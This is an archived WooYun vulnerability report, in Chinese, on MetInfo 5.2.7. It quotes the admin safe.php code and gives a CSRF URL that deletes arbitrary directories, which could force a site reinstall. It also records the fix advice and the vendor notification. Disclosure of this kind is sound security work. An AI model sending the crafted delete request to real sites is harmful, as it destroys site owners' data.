乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-24: 细节已通知厂商并且等待厂商处理中 2014-07-29: 厂商已经确认,细节仅向厂商公开 2014-08-01: 细节向第三方安全合作伙伴开放 2014-09-22: 细节向核心白帽子及相关领域专家公开 2014-10-02: 细节向普通白帽子公开 2014-10-12: 细节向实习白帽子公开 2014-10-22: 细节向公众公开
Metinfo某漏洞可导致重装网站
官方最新的5.2.7 (测试通过)问题出现在 metinfo/admin/system/safe.php
<?php# MetInfo Enterprise Content Management System # Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. require_once '../login/login_check.php';$adminfile=$url_array[count($url_array)-2];if($action=="delete"){ if($filename=='update')@chmod('../../update/install.lock',0777); function deldirs($dir){ $dh=opendir($dir); while ($file=readdir($dh)) { if($file!="." && $file!="..") { $fullpath=$dir."/".$file; if(!is_dir($fullpath)) { unlink($fullpath); } else { deldir($fullpath); } } } closedir($dh); if($dir!='../../upload'){ if(rmdir($dir)) { return true; } else { return false; } } } $dir='../../'.$filename; deldirs($dir); metsave('../system/safe.php?anyid='.$anyid.'&lang='.$lang);}if($action=="modify"){ if($met_adminfile!=""&&$met_adminfile!=$adminfile){ $met_adminfile_temp=$met_adminfile; $met_adminfile_code=authcode($met_adminfile,'ENCODE', $met_webkeys); require_once $depth.'../include/config.php'; Header("Location: ../index.php?lang=".$lang."&action=renameadmin&adminmodify=1&met_adminfile=".$met_adminfile_temp); }else{ require_once $depth.'../include/config.php'; metsave('../system/safe.php?anyid='.$anyid.'&lang='.$lang); }}else{$localurl="http://";$localurl.=$_SERVER['HTTP_HOST'].$_SERVER["PHP_SELF"];$localurl_a=explode("/",$localurl);$localurl_count=count($localurl_a);$localurl_admin=$localurl_a[$localurl_count-3];$localurl_admin=$localurl_admin."/system/safe";$localurl_real=explode($localurl_admin,$localurl);$localurl=$localurl_real[0];if(!is_dir('../../install'))$installstyle="display:none;";if(!is_dir('../../update'))$updatestyle="display:none;";$met_login_code1[$met_login_code]="checked='checked'";$met_memberlogin_code1[$met_memberlogin_code]="checked='checked'";$met_automatic_upgrade1[$met_automatic_upgrade]="checked";$css_url="../templates/".$met_skin."/css";$img_url="../templates/".$met_skin."/images";include template('system/set_safe');footer();}# This program is an open source system, commercial use, please consciously to purchase commercial license.# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.?>
当action为delete的时候,便可以删除任意目录(因为没CSRF防护所以可以进行CSRF攻击)可以构造CSRF请求:
http://localhost/metinfo/admin/system/safe.php?anyid=12&action=delete&filename=test&lang=cn
上面请求可删除名为'test'的目录
过后尝试发起请求,test目录就被删除了
增加一些防CSRF措施和只允许删除install目录
危害等级:中
漏洞Rank:10
确认时间:2014-07-29 09:24
CNVD确认并复现所述情况,已经由CNVD根据以往建立的联系处置渠道向软件生产厂商长沙米拓公司通报。
暂无